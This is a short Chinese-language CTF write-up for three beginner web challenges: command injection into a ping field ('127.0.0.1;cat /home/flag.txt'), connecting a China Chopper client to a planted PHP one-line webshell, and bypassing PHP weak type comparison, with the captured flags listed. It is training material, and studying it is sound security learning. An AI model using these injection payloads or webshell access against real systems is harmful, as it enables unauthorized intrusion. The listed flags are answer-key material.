新手入门区域
1.command_execution
小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。
wp:
输入127.0.0.1;ls,发现可执行后面的ls,故直接用find命令查找:127.0.0.1;find / -name '*flag*'
看到/home/flag.txt ,于是输入:127.0.0.1;cat /home/flag.txt 拿到flag:
cyberpeace{c9ed5c3cdb8d1e9c140ca4457d6e2412}2.webshell
小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。
wp:
我的场景ip地址是http://111.198.29.45:33638
直接上中国菜刀连接http://111.198.29.45:33638/index.php,参数填shell
然后打开终端,ls--->cat flag.txt拿到flag:cyberpeace{ea8df082fd193ea320849f101f4fbf57}
3.simple_php
小宁听说php是最好的语言,于是她简单学习之后写了几行php代码
给出了比较逻辑:
<?php
show_source(__FILE__);
include("config.php");
$a=@$_GET['a'];
$b=@$_GET['b'];
if($a==0 and $a){
echo $flag1;
}
if(is_numeric($b)){
exit();
}
if($b>1234){
echo $flag2;
}
?>
wp:
第一个参数a可以等于0也可以等于'',因为是弱类型比较。
第二个参数b首先判断是否是数字,那就在数字后面加字母就不是数字了。
然后只需要比1235大就行
故参数a=''&b=1236qwe
拿到flag:Cyberpeace{647E37C7627CC3E4019EC69324F66C7C}
